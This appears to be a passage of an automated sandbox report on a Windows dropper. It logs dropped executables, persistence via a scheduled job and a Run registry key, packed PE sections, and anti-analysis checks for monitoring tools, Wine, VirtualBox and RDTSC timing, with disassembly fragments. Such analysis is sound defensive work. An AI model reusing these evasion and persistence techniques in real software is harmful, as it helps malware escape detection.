Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: winmm.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: sspicli.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: wininet.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: ncrypt.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: ntasn1.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: iertutil.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: windows.storage.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: wldp.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: profapi.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: winhttp.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: mswsock.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: winnsi.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: urlmon.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: srvcli.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: 4qIl08vrFY.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 4qIl08vrFY.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 4qIl08vrFY.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 4qIl08vrFY.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 4qIl08vrFY.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 4qIl08vrFY.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 4qIl08vrFY.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: 4qIl08vrFY.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 4qIl08vrFY.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 4qIl08vrFY.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 4qIl08vrFY.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 4qIl08vrFY.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 4qIl08vrFY.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\1000115002\6b11689b40.exe Unpacked PE file: 5.2.6b11689b40.exe.be0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ipavvigs:EW;zxudawlj:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ipavvigs:EW;zxudawlj:EW;.taggant:EW;
Source: C:\Users\user\1000115002\6b11689b40.exe Unpacked PE file: 13.2.6b11689b40.exe.be0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ipavvigs:EW;zxudawlj:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ipavvigs:EW;zxudawlj:EW;.taggant:EW;
Source: C:\Users\user\1000115002\6b11689b40.exe Unpacked PE file: 14.2.6b11689b40.exe.be0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ipavvigs:EW;zxudawlj:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ipavvigs:EW;zxudawlj:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006CBF99 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_006CBF99
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: num[1].exe.3.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: random[1].exe.3.dr Static PE information: real checksum: 0x1d2063 should be: 0x1c9d43
Source: num.exe.3.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: 6b11689b40.exe.3.dr Static PE information: real checksum: 0x1d2063 should be: 0x1c9d43
Source: skotes.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x773ae
Source: 4qIl08vrFY.exe Static PE information: real checksum: 0x0 should be: 0x773ae
PE file contains sections with non-standard names
Source: random[1].exe.3.dr Static PE information: section name:
Source: random[1].exe.3.dr Static PE information: section name: .rsrc
Source: random[1].exe.3.dr Static PE information: section name: .idata
Source: random[1].exe.3.dr Static PE information: section name:
Source: random[1].exe.3.dr Static PE information: section name: ipavvigs
Source: random[1].exe.3.dr Static PE information: section name: zxudawlj
Source: random[1].exe.3.dr Static PE information: section name: .taggant
Source: 6b11689b40.exe.3.dr Static PE information: section name:
Source: 6b11689b40.exe.3.dr Static PE information: section name: .rsrc
Source: 6b11689b40.exe.3.dr Static PE information: section name: .idata
Source: 6b11689b40.exe.3.dr Static PE information: section name:
Source: 6b11689b40.exe.3.dr Static PE information: section name: ipavvigs
Source: 6b11689b40.exe.3.dr Static PE information: section name: zxudawlj
Source: 6b11689b40.exe.3.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006B1359 push es; ret 0_2_006B135A
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006BD91C push ecx; ret 0_2_006BD92F
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006BDFC6 push ecx; ret 0_2_006BDFD9
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00151359 push es; ret 1_2_0015135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_0015D91C push ecx; ret 1_2_0015D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_0015DFC6 push ecx; ret 1_2_0015DFD9
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_0006B035 push ecx; ret 4_2_0006B048
Source: random[1].exe.3.dr Static PE information: section name: ipavvigs entropy: 7.953643928578973
Source: 6b11689b40.exe.3.dr Static PE information: section name: ipavvigs entropy: 7.953643928578973
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\1000115002\6b11689b40.exe Jump to dropped file
Source: C:\Users\user\Desktop\4qIl08vrFY.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\1000115002\6b11689b40.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Window searched: window name: FilemonClass
Source: C:\Users\user\1000115002\6b11689b40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\1000115002\6b11689b40.exe Window searched: window name: RegmonClass
Source: C:\Users\user\1000115002\6b11689b40.exe Window searched: window name: FilemonClass
Source: C:\Users\user\1000115002\6b11689b40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\1000115002\6b11689b40.exe Window searched: window name: FilemonClass
Source: C:\Users\user\1000115002\6b11689b40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\1000115002\6b11689b40.exe Window searched: window name: RegmonClass
Source: C:\Users\user\1000115002\6b11689b40.exe Window searched: window name: FilemonClass
Source: C:\Users\user\1000115002\6b11689b40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\Desktop\4qIl08vrFY.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6b11689b40.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6b11689b40.exe Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006BC768 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_006BC768
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\1000115002\6b11689b40.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\1000115002\6b11689b40.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\1000115002\6b11689b40.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\1000115002\6b11689b40.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FBD2D5 second address: FBD2D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FC0672 second address: FC06E7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jc 00007F0D8517B906h 0x0000000d pop ebx 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 or dword ptr [ebp+122D183Dh], ecx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007F0D8517B908h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 xor di, F4F7h 0x00000039 call 00007F0D8517B909h 0x0000003e pushad 0x0000003f jnl 00007F0D8517B90Ch 0x00000045 jnl 00007F0D8517B906h 0x0000004b jmp 00007F0D8517B914h 0x00000050 popad 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push esi 0x00000055 push edx 0x00000056 pop edx 0x00000057 pop esi 0x00000058 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FC088E second address: FC08AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D84D62029h 0x00000009 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FC08AB second address: FC08AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FC08AF second address: FC0903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F0D84D62018h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 mov edx, ecx 0x00000025 push ebx 0x00000026 movzx edi, cx 0x00000029 pop edi 0x0000002a push 00000000h 0x0000002c cmc 0x0000002d call 00007F0D84D62019h 0x00000032 push ecx 0x00000033 jmp 00007F0D84D62020h 0x00000038 pop ecx 0x00000039 push eax 0x0000003a pushad 0x0000003b push esi 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FC0903 second address: FC093F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop esi 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jnl 00007F0D8517B927h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FC093F second address: FC0943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FC0943 second address: FC09CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D8517B917h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f jmp 00007F0D8517B915h 0x00000014 jno 00007F0D8517B908h 0x0000001a popad 0x0000001b pop eax 0x0000001c mov cl, 8Ah 0x0000001e push 00000003h 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007F0D8517B908h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 00000014h 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a clc 0x0000003b push 00000000h 0x0000003d movzx ecx, ax 0x00000040 or dword ptr [ebp+122D1B14h], ecx 0x00000046 push 00000003h 0x00000048 jp 00007F0D8517B911h 0x0000004e js 00007F0D8517B90Bh 0x00000054 push C7DDA189h 0x00000059 pushad 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FC09CB second address: FC0A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnp 00007F0D84D6201Ch 0x0000000b popad 0x0000000c xor dword ptr [esp], 07DDA189h 0x00000013 mov edx, eax 0x00000015 or dword ptr [ebp+122D339Bh], esi 0x0000001b lea ebx, dword ptr [ebp+1245258Ah] 0x00000021 push 00000000h 0x00000023 push esi 0x00000024 call 00007F0D84D62018h 0x00000029 pop esi 0x0000002a mov dword ptr [esp+04h], esi 0x0000002e add dword ptr [esp+04h], 00000015h 0x00000036 inc esi 0x00000037 push esi 0x00000038 ret 0x00000039 pop esi 0x0000003a ret 0x0000003b jmp 00007F0D84D62020h 0x00000040 or edx, 289F7802h 0x00000046 push eax 0x00000047 js 00007F0D84D62020h 0x0000004d push eax 0x0000004e push edx 0x0000004f push edi 0x00000050 pop edi 0x00000051 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FC0A96 second address: FC0A9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FC0A9A second address: FC0AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FC0AA4 second address: FC0AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
